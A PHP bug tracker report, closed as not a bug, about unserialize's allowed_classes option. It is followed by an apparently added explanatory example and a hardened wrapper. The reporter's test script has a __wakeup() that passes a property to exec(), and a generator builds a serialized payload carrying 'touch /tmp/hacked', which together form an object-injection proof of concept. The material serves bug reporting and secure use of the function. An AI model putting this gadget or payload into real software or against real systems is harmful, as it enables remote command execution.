Bug #79429 $options parameter of unserialize is ignored
Submitted: 2020-03-29 17:52 UTC Modified: 2020-03-30 11:25 UTC
From: fady dot mohamed dot osman at gmail dot com Assigned: cmb
Status: Not a bug Package: Unknown/Other Function
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
 [2020-03-29 17:52 UTC] fady dot mohamed dot osman at gmail dot com
Not sure if this is expected behavior, but it seems odd: the second parameter of unserialize is completely useless; any class can be easily loaded even if it is not defined in the array (second parameter of unserialize). This is due to the following:

* PHP automatically defines a member variable if it doesn't exist in the class definition.
* Unserialize does the same: if an undefined value is provided it will define it, and if it's a class it will create an object without checking if it's in the whitelist.

By providing a dummy variable that doesn't exist in a class that is allowed by the second parameter, we can deserialize any class of our choice.

Test script:
-- Code that does the deserialization --

<?php
class Helper {
    public $dummy = "asdasd";
    public $exec = "ls";

    public function __wakeup() {
        // Method body missing from the report; reconstructed from the $exec
        // property, which holds the shell command to run.
        exec($this->exec);
    }
}

class MayBe {
    public $myvar = "OK";
}

if(isset($_POST["serialized"])) {
    // The call quoted in the closing reply: the whitelist is given as a string.
    unserialize($_POST["serialized"], ['allowed_classes' => "MayBe"]);
    $message = "Data was unserialized!!";
    echo $message;
}

-- Code to generate a serialized string that will bypass the check ---

<?php
// Needs the Helper and MayBe class definitions above in scope.
$myhelper = new Helper;
$myclass = new MayBe;

$myclass->myvar = "WOW";

$myhelper->exec = "touch /tmp/hacked";

// This is not defined in the MayBe class but will be automatically defined upon deserialization.
$myclass->dummy = $myhelper;

echo serialize($myclass);


Expected result:
The method shouldn't deserialize a class that is not in the list.

Actual result:
Any class can be deserialized regardless of the second argument of unserialize.


 [2020-03-30 11:25 UTC]
-Status: Open +Status: Not a bug -Type: Security +Type: Bug -Assigned To: +Assigned To: cmb
 [2020-03-30 11:25 UTC]
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at and the instructions on how to report
a bug at

unserialize($_POST["serialized"],['allowed_classes' => "MayBe"]);
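The quoted call is the reason for the closure. The allowed_classes option takes an array of class names, or true/false; the reporter passed the string "MayBe", which the PHP 7 releases current at the time treat as a truthy non-array, i.e. the same as true, so every class was allowed. The dynamic "dummy" property plays no role: with an array whitelist, a nested object of a non-listed class is turned into a __PHP_Incomplete_Class and its __wakeup() is never called. The following is an added example, not code from the report or from PHP itself. It rebuilds the reporter's payload (Helper reduced to its $exec property, and __wakeup() only logging instead of executing), runs it through the three option forms, and adds a small wrapper that refuses anything but a list of class-name strings. The TypeError branch is an assumption: newer PHP releases may reject a non-array, non-bool option value instead of treating it as true, so check the behaviour of your own version.

```php
<?php
declare(strict_types=1);

// Added example for bug #79429; not code from the report. It reproduces the
// reporter's payload and shows that the whitelist is only "ignored" when
// allowed_classes is passed as a string instead of an array.

class Helper
{
    public static $wakeups = [];   // records every __wakeup() call
    public $exec = 'ls';

    public function __wakeup()
    {
        // The reporter's Helper executes $this->exec here. This one only logs it,
        // which is enough to show whether attacker-controlled code would have run.
        self::$wakeups[] = $this->exec;
    }
}

#[AllowDynamicProperties] // silences the PHP 8.2+ deprecation for "dummy"; a plain comment on PHP 7
class MayBe
{
    public $myvar = 'OK';
}

// Constructed payload, equal to what the reporter's generator script prints
// (with Helper reduced to its $exec property): a MayBe whose dynamic property
// "dummy" holds a Helper.
const PAYLOAD = 'O:5:"MayBe":2:{s:5:"myvar";s:3:"WOW";s:5:"dummy";'
    . 'O:6:"Helper":1:{s:4:"exec";s:17:"touch /tmp/hacked";}}';

/**
 * Unserialize PAYLOAD with the given allowed_classes value and report what the
 * nested "dummy" value became. Properties of an incomplete object are never
 * read, because PHP 8 throws an Error on that access.
 */
function nestedClassOf($allowedClasses): string
{
    Helper::$wakeups = [];
    try {
        $obj = unserialize(PAYLOAD, ['allowed_classes' => $allowedClasses]);
    } catch (TypeError $e) {
        // Assumption: a newer PHP release may reject a non-array, non-bool option value.
        return 'TypeError: ' . $e->getMessage();
    }
    if (!is_object($obj)) {
        return gettype($obj);
    }
    if ($obj instanceof __PHP_Incomplete_Class) {
        return get_class($obj) . ' (outer object)';
    }
    $nested = $obj->dummy;
    return is_object($nested) ? get_class($nested) : gettype($nested);
}

/**
 * Hardened wrapper: accept only a list of class-name strings, so a string,
 * integer or null can never silently widen the whitelist to "every class".
 */
function safeUnserialize(string $data, array $allowed)
{
    foreach ($allowed as $cls) {
        if (!is_string($cls) || $cls === '') {
            throw new InvalidArgumentException('allowed_classes must be a list of class-name strings');
        }
    }
    return unserialize($data, ['allowed_classes' => $allowed]);
}

$cases = [
    'string "MayBe" (the reporter\'s call)' => 'MayBe',
    'array ["MayBe"]'                        => ['MayBe'],
    'false'                                  => false,
];
foreach ($cases as $label => $value) {
    // nestedClassOf() runs before count() because PHP evaluates arguments left to right.
    printf("allowed_classes = %-38s dummy became %-31s __wakeup calls: %d\n",
        $label, nestedClassOf($value), count(Helper::$wakeups));
}

// With the array form the nested Helper survives only as an incomplete object
// and its __wakeup() never runs; safeUnserialize() keeps it that way.
$safe = safeUnserialize(PAYLOAD, ['MayBe']);
echo get_class($safe), "\n";
```

On a PHP 7 build the first case reports the nested value as Helper with one __wakeup() call (the reporter's "bypass"), the array form reports __PHP_Incomplete_Class with no call, and false leaves even the outer MayBe incomplete. The wrapper exists because the failure mode here is a type slip that PHP 7 accepts silently: validating the option before the call, or enabling strict static analysis on it, is what actually closes the hole the report describes.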